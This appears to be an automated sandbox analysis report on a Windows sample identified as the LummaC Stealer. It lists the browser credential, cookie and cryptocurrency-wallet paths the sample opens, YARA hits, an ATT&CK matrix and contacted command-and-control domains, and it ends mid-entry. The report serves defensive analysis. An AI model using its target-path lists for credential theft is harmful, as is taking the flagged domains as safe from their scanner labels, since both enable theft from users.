Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Directory queried: C:\Users\user\Documents	Jump to behavior

Source: Yara match	File source: 00000000.00000003.1724865507.0000000002B29000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1762484682.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1776086963.0000000002ADA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1762072138.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1765200814.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1762316213.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1764223010.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1764065027.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1762684791.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1763840024.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1762853508.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1765856289.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1764944431.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1749261230.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1765654147.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1748819619.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1763621204.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1764765677.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1765375186.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1775926107.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1763297825.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1763071930.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 3696, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: file.exe PID: 3696, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	11 Virtualization/Sandbox Evasion	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	11 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	31 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	4 Obfuscated Files or Information	NTDS	1 File and Directory Discovery	Distributed Component Object Model	2 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	22 Software Packing	LSA Secrets	12 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Avira	HEUR/AGEN.1318160
file.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://crl.rootca1.amazontrust.com/rootca1.crl0	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://crt.rootca1.amazontrust.com/rootca1.cer0?	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	0%	Avira URL Cloud	safe
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://stationacutwo.shopnF2	0%	Avira URL Cloud	safe
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	0%	Avira URL Cloud	safe
https://stationacutwo.shopcF2	0%	Avira URL Cloud	safe
radiationnopp.shop	0%	Avira URL Cloud	safe
http://ocsp.rootca1.amazontrust.com0:	0%	Avira URL Cloud	safe
answerrsdo.shop	0%	Avira URL Cloud	safe
publicitttyps.shop	0%	Avira URL Cloud	safe
https://stationacutwo.shop/apicu	0%	Avira URL Cloud	safe
https://stationacutwo.shop/_V	0%	Avira URL Cloud	safe
https://stationacutwo.shop:4	0%	Avira URL Cloud	safe
benchillppwo.shop	0%	Avira URL Cloud	safe
https://stationacutwo.shop/oVrc:	0%	Avira URL Cloud	safe
bouncedgowp.shop	0%	Avira URL Cloud	safe
bargainnykwo.shop	0%	Avira URL Cloud	safe
bannngwko.shop	0%	Avira URL Cloud	safe
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	0%	Avira URL Cloud	safe
https://support.microsof	0%	Avira URL Cloud	safe
https://stationacutwo.shop/	0%	Avira URL Cloud	safe
stationacutwo.shop	0%	Avira URL Cloud	safe
https://stationacutwo.shop/:	0%	Avira URL Cloud	safe
https://stationacutwo.shop/apili	0%	Avira URL Cloud	safe
https://stationacutwo.shop:443/api	0%	Avira URL Cloud	safe
https://stationacutwo.shop/api	0%	Avira URL Cloud	safe
https://stationacutwo.shop/l	0%	Avira URL Cloud	safe
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	0%	Avira URL Cloud	safe
https://support.mozilla.org/products/firefoxgro.all	0%	Avira URL Cloud	safe
affecthorsedpo.shop	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
stationacutwo.shop	188.114.97.3	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
radiationnopp.shop	true	Avira URL Cloud: safe	unknown
publicitttyps.shop	true	Avira URL Cloud: safe	unknown
answerrsdo.shop	true	Avira URL Cloud: safe	unknown
benchillppwo.shop	true	Avira URL Cloud: safe	unknown
bargainnykwo.shop	true	Avira URL Cloud: safe	unknown
bouncedgowp.shop	true	Avira URL Cloud: safe	unknown
bannngwko.shop	true	Avira URL Cloud: safe	unknown
stationacutwo.shop	true	Avira URL Cloud: safe	unknown
https://stationacutwo.shop/api	false	Avira URL Cloud: safe	unknown
affecthorsedpo.shop	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.1727287274.0000000004F4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1727549357.0000000004F38000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.1727287274.0000000004F4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1727549357.0000000004F38000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	file.exe, 00000000.00000003.1751313327.0000000002B3C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000000.00000003.1727287274.0000000004F4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1727549357.0000000004F38000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://stationacutwo.shopnF2	file.exe, 00000000.00000003.1738900570.0000000002AB9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	file.exe, 00000000.00000003.1751313327.0000000002B3C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.1727287274.0000000004F4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1727549357.0000000004F38000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0	file.exe, 00000000.00000003.1749176406.0000000004F3E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	file.exe, 00000000.00000003.1751313327.0000000002B3C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.4.dr	false	URL Reputation: safe	unknown
https://stationacutwo.shopcF2	file.exe, 00000000.00000003.1738900570.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000003.1727287274.0000000004F4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1727549357.0000000004F38000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsp.rootca1.amazontrust.com0:	file.exe, 00000000.00000003.1749176406.0000000004F3E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	file.exe, 00000000.00000003.1726908542.0000000004F7C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	file.exe, 00000000.00000003.1726908542.0000000004F7C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.1727287274.0000000004F4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1727549357.0000000004F38000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://stationacutwo.shop/_V	file.exe, 00000000.00000003.1727378356.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1725431973.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1726189122.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	file.exe, 00000000.00000003.1750632597.0000000005045000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://stationacutwo.shop:4	file.exe, 00000000.00000003.1775926107.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000000.00000003.1727287274.0000000004F4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1727549357.0000000004F38000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://stationacutwo.shop/apicu	file.exe, 00000000.00000003.1822068853.0000000004F22000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2033139643.0000000004F24000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://stationacutwo.shop/oVrc:	file.exe, 00000000.00000003.1748819619.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749261230.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000003.1751313327.0000000002B3C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	file.exe, 00000000.00000003.1751313327.0000000002B3C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://stationacutwo.shop/	file.exe, 00000000.00000003.1775886728.0000000002B27000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1762316213.0000000002AB9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1748819619.0000000002B29000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764065027.0000000002AB9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1762072138.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1763297825.0000000002AB9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1762853508.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764223010.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749127484.0000000002B29000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1762684791.0000000002AB9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1763840024.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1725431973.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1764065027.0000000002AC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 